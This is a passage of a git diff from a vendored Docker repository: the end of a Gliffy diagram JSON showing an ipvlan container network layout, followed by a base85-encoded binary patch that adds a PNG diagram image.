style=\"font-weight:bold;\">Router</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":29.0,"y":358.1999969482422,"rotation":0.0,"id":304,"width":390.99999999999994,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":29,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\">All containers can ping each other <span style=\"font-weight:bold;\">without</span> a router if </span></p><p style=\"text-align:center;\"><span style=\"font-size:14px;\">they share the <span style=\"font-weight:bold;\">same</span> parent interface (<span style=\"font-style:italic;\">example eth0)</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":24.0,"y":276.0,"rotation":0.0,"id":320,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":48,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":316,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":317,"width":109.44000000000001,"height":43.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0&nbsp;</span></span></p><p style=\"text-align:center;\"><span style=\"font-weight:bold;\">172.16.20.x/24</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":318,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":319,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":300.0,"y":276.0,"rotation":0.0,"id":321,"width":134.0,"height":77.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":49,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":272,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":35,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[{"x":2.279999999999999,"y":0.0,"rotation":0.0,"id":273,"width":109.44000000000001,"height":44.0,"uid":null,"order":38,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.20.x/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":10.0,"y":10.0,"rotation":0.0,"id":310,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":20.0,"y":20.0,"rotation":0.0,"id":312,"width":114.0,"height":57.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":31,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":0.97,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":85.93295288085938,"rotation":0.0,"id":322,"width":100.0,"height":100.0,"uid":"com.gliffy.shape.uml.uml_v2.sequence.anchor_line","order":50,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#434343","fillColor":"none","dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-191.0,222.06704711914062],[-80.9272967534639,222.06704711914062]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":167.0,"y":25.499999999999986,"rotation":0.0,"id":323,"width":135.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":51,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;font-weight:bold;font-family:Arial;\">Physical Network</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":53}],"shapeStyles":{},"lineStyles":{"global":{"fill":"none","stroke":"#434343","strokeWidth":2,"dashStyle":"4.0,4.0","startArrow":2,"endArrow":2,"orthoMode":2}},"textStyles":{"global":{"face":"Arial","size":"13px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.basic.basic_v1.default","com.gliffy.libraries.flowchart.flowchart_v1.default","com.gliffy.libraries.swimlanes.swimlanes_v1.default","com.gliffy.libraries.images","com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1458117032939,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png b/vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png
new file mode 100644
index 0000000000000000000000000000000000000000..3227a83ca1541ec68e06b0aa105e22fdf5ae9e6f
GIT binary patch
literal 18260
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
